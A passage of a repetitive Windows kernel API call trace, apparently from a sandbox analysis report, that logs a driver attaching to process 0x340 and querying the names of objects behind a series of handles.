ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.929] ObfDereferenceObject (Object=0xffffe00069916d10) returned 0x800c [0264.929] IoCompleteRequest () returned 0x0 [0264.929] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.929] PsAcquireProcessExitSynchronization () returned 0x0 [0264.929] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.929] ObReferenceObjectByHandle (in: Handle=0x700, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b87580, HandleInformation=0x0) returned 0x0 [0264.929] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.929] PsReleaseProcessExitSynchronization () returned 0x2 [0264.929] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40029 [0264.929] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.929] ObfDereferenceObject (Object=0xffffe00069b87580) returned 0x800c [0264.929] IoCompleteRequest () returned 0x0 [0264.929] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.929] PsAcquireProcessExitSynchronization () returned 0x0 [0264.929] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.929] ObReferenceObjectByHandle (in: Handle=0x70c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069be4f20, HandleInformation=0x0) returned 0x0 [0264.929] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.929] PsReleaseProcessExitSynchronization () returned 0x2 [0264.929] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40028 [0264.929] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.929] ObfDereferenceObject (Object=0xffffe00069be4f20) returned 0x800f [0264.929] IoCompleteRequest () returned 0x0 [0264.929] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.929] PsAcquireProcessExitSynchronization () returned 0x0 [0264.929] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.929] ObReferenceObjectByHandle (in: Handle=0x710, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069be3090, HandleInformation=0x0) returned 0x0 [0264.929] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.929] PsReleaseProcessExitSynchronization () returned 0x2 [0264.929] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40027 [0264.929] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.929] ObfDereferenceObject (Object=0xffffe00069be3090) returned 0x800d [0264.929] IoCompleteRequest () returned 0x0 [0264.929] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.929] PsAcquireProcessExitSynchronization () returned 0x0 [0264.930] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.930] ObReferenceObjectByHandle (in: Handle=0x718, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069be2090, HandleInformation=0x0) returned 0x0 [0264.930] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.930] PsReleaseProcessExitSynchronization () returned 0x2 [0264.930] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40026 [0264.930] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.930] ObfDereferenceObject (Object=0xffffe00069be2090) returned 0x800f [0264.930] IoCompleteRequest () returned 0x0 [0264.930] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.930] PsAcquireProcessExitSynchronization () returned 0x0 [0264.930] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.930] ObReferenceObjectByHandle (in: Handle=0x71c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699e2910, HandleInformation=0x0) returned 0x0 [0264.930] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.930] PsReleaseProcessExitSynchronization () returned 0x2 [0264.930] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40025 [0264.930] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.930] ObfDereferenceObject (Object=0xffffe000699e2910) returned 0x800f [0264.930] IoCompleteRequest () returned 0x0 [0264.930] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.930] PsAcquireProcessExitSynchronization () returned 0x0 [0264.930] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.930] ObReferenceObjectByHandle (in: Handle=0x720, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699fcaf0, HandleInformation=0x0) returned 0x0 [0264.930] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.930] PsReleaseProcessExitSynchronization () returned 0x2 [0264.930] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40024 [0264.930] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.930] ObfDereferenceObject (Object=0xffffe000699fcaf0) returned 0x800f [0264.930] IoCompleteRequest () returned 0x0 [0264.930] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.930] PsAcquireProcessExitSynchronization () returned 0x0 [0264.930] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.930] ObReferenceObjectByHandle (in: Handle=0x724, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699e3f20, HandleInformation=0x0) returned 0x0 [0264.930] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.930] PsReleaseProcessExitSynchronization () returned 0x2 [0264.930] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40023 [0264.930] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.930] ObfDereferenceObject (Object=0xffffe000699e3f20) returned 0x800b [0264.930] IoCompleteRequest () returned 0x0 [0264.930] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.930] PsAcquireProcessExitSynchronization () returned 0x0 [0264.930] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.930] ObReferenceObjectByHandle (in: Handle=0x728, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b66a20, HandleInformation=0x0) returned 0x0 [0264.930] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.931] PsReleaseProcessExitSynchronization () returned 0x2 [0264.931] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40022 [0264.931] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.931] ObfDereferenceObject (Object=0xffffe00069b66a20) returned 0x800f [0264.931] IoCompleteRequest () returned 0x0 [0264.931] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.931] PsAcquireProcessExitSynchronization () returned 0x0 [0264.931] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.931] ObReferenceObjectByHandle (in: Handle=0x72c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069be1430, HandleInformation=0x0) returned 0x0 [0264.931] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.931] PsReleaseProcessExitSynchronization () returned 0x2 [0264.931] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40021 [0264.931] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.931] ObfDereferenceObject (Object=0xffffe00069be1430) returned 0x800f [0264.931] IoCompleteRequest () returned 0x0 [0264.931] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.931] PsAcquireProcessExitSynchronization () returned 0x0 [0264.931] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.931] ObReferenceObjectByHandle (in: Handle=0x734, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b66dd0, HandleInformation=0x0) returned 0x0 [0264.931] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.931] PsReleaseProcessExitSynchronization () returned 0x2 [0264.931] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40020 [0264.931] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.931] ObfDereferenceObject (Object=0xffffe00069b66dd0) returned 0x800f [0264.931] IoCompleteRequest () returned 0x0 [0264.931] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.931] PsAcquireProcessExitSynchronization () returned 0x0 [0264.931] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.931] ObReferenceObjectByHandle (in: Handle=0x738, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000727ff840, HandleInformation=0x0) returned 0x0 [0264.931] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.931] PsReleaseProcessExitSynchronization () returned 0x2 [0264.931] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4001f [0264.931] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.931] ObfDereferenceObject (Object=0xffffe000727ff840) returned 0x8009 [0264.931] IoCompleteRequest () returned 0x0 [0264.931] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.931] PsAcquireProcessExitSynchronization () returned 0x0 [0264.931] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.931] ObReferenceObjectByHandle (in: Handle=0x73c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000727ffa00, HandleInformation=0x0) returned 0x0 [0264.931] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.931] PsReleaseProcessExitSynchronization () returned 0x2 [0264.931] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4001e [0264.931] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.931] ObfDereferenceObject (Object=0xffffe000727ffa00) returned 0x800b [0264.931] IoCompleteRequest () returned 0x0 [0264.932] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.932] PsAcquireProcessExitSynchronization () returned 0x0 [0264.932] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.932] ObReferenceObjectByHandle (in: Handle=0x758, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069e32340, HandleInformation=0x0) returned 0x0 [0264.932] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.932] PsReleaseProcessExitSynchronization () returned 0x2 [0264.932] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4001d [0264.932] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.932] ObfDereferenceObject (Object=0xffffe00069e32340) returned 0x800d [0264.932] IoCompleteRequest () returned 0x0 [0264.932] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.932] PsAcquireProcessExitSynchronization () returned 0x0 [0264.932] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.932] ObReferenceObjectByHandle (in: Handle=0x75c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069e3a090, HandleInformation=0x0) returned 0x0 [0264.932] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.932] PsReleaseProcessExitSynchronization () returned 0x2 [0264.932] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4001c [0264.932] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.932] ObfDereferenceObject (Object=0xffffe00069e3a090) returned 0x800f [0264.932] IoCompleteRequest () returned 0x0 [0264.932] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.932] PsAcquireProcessExitSynchronization () returned 0x0 [0264.932] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.932] ObReferenceObjectByHandle (in: Handle=0x764, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069fa8590, HandleInformation=0x0) returned 0x0 [0264.932] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.932] PsReleaseProcessExitSynchronization () returned 0x2 [0264.932] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4001b [0264.932] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.932] ObfDereferenceObject (Object=0xffffe00069fa8590) returned 0x800f [0264.932] IoCompleteRequest () returned 0x0 [0264.932] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.932] PsAcquireProcessExitSynchronization () returned 0x0 [0264.932] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.932] ObReferenceObjectByHandle (in: Handle=0x770, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f578e0, HandleInformation=0x0) returned 0x0 [0264.932] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.932] PsReleaseProcessExitSynchronization () returned 0x2 [0264.932] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4001a [0264.932] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.932] ObfDereferenceObject (Object=0xffffe00069f578e0) returned 0x8009 [0264.932] IoCompleteRequest () returned 0x0 [0264.932] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.933] PsAcquireProcessExitSynchronization () returned 0x0 [0264.933] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.933] ObReferenceObjectByHandle (in: Handle=0x774, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f95400, HandleInformation=0x0) returned 0x0 [0264.933] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.933] PsReleaseProcessExitSynchronization () returned 0x2 [0264.933] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40019 [0264.933] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.933] ObfDereferenceObject (Object=0xffffe00069f95400) returned 0x800d [0264.933] IoCompleteRequest () returned 0x0 [0264.933] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.933] PsAcquireProcessExitSynchronization () returned 0x0 [0264.933] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.933] ObReferenceObjectByHandle (in: Handle=0x778, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f20550, HandleInformation=0x0) returned 0x0 [0264.933] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.933] PsReleaseProcessExitSynchronization () returned 0x2 [0264.933] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40018 [0264.933] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.933] ObfDereferenceObject (Object=0xffffe00069f20550) returned 0x800f [0264.933] IoCompleteRequest () returned 0x0 [0264.933] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.933] PsAcquireProcessExitSynchronization () returned 0x0 [0264.933] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.933] ObReferenceObjectByHandle (in: Handle=0x77c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f41190, HandleInformation=0x0) returned 0x0 [0264.933] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.933] PsReleaseProcessExitSynchronization () returned 0x2 [0264.933] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40017 [0264.933] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.933] ObfDereferenceObject (Object=0xffffe00069f41190) returned 0x800f [0264.933] IoCompleteRequest () returned 0x0 [0264.934] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.934] PsAcquireProcessExitSynchronization () returned 0x0 [0264.934] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.934] ObReferenceObjectByHandle (in: Handle=0x780, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f49cc0, HandleInformation=0x0) returned 0x0 [0264.934] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.934] PsReleaseProcessExitSynchronization () returned 0x2 [0264.934] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40016 [0264.934] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.934] ObfDereferenceObject (Object=0xffffe00069f49cc0) returned 0x800d [0264.934] IoCompleteRequest () returned 0x0 [0264.934] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.934] PsAcquireProcessExitSynchronization () returned 0x0 [0264.934] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.934] ObReferenceObjectByHandle (in: Handle=0x794, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a58650, HandleInformation=0x0) returned 0x0 [0264.934] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.934] PsReleaseProcessExitSynchronization () returned 0x2 [0264.934] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40015 [0264.934] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.934] ObfDereferenceObject (Object=0xffffe00069a58650) returned 0x8019 [0264.934] IoCompleteRequest () returned 0x0 [0264.934] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.934] PsAcquireProcessExitSynchronization () returned 0x0 [0264.934] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.934] ObReferenceObjectByHandle (in: Handle=0x798, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a0a09d0, HandleInformation=0x0) returned 0x0 [0264.934] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.934] PsReleaseProcessExitSynchronization () returned 0x2 [0264.935] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40014 [0264.935] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.935] ObfDereferenceObject (Object=0xffffe0006a0a09d0) returned 0x8019 [0264.935] IoCompleteRequest () returned 0x0 [0264.935] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.935] PsAcquireProcessExitSynchronization () returned 0x0 [0264.935] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.935] ObReferenceObjectByHandle (in: Handle=0x7b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a28e550, HandleInformation=0x0) returned 0x0 [0264.935] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.935] PsReleaseProcessExitSynchronization () returned 0x2 [0264.935] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40013 [0264.935] ObQueryNameString (in: Object=0xffffe0006a28e550, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.935] ObfDereferenceObject (Object=0xffffe0006a28e550) returned 0x7fff [0264.935] IoCompleteRequest () returned 0x0 [0264.935] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.935] PsAcquireProcessExitSynchronization () returned 0x0 [0264.935] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.935] ObReferenceObjectByHandle (in: Handle=0x7c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a4975a0, HandleInformation=0x0) returned 0x0 [0264.935] KeUnstackDetachProcess 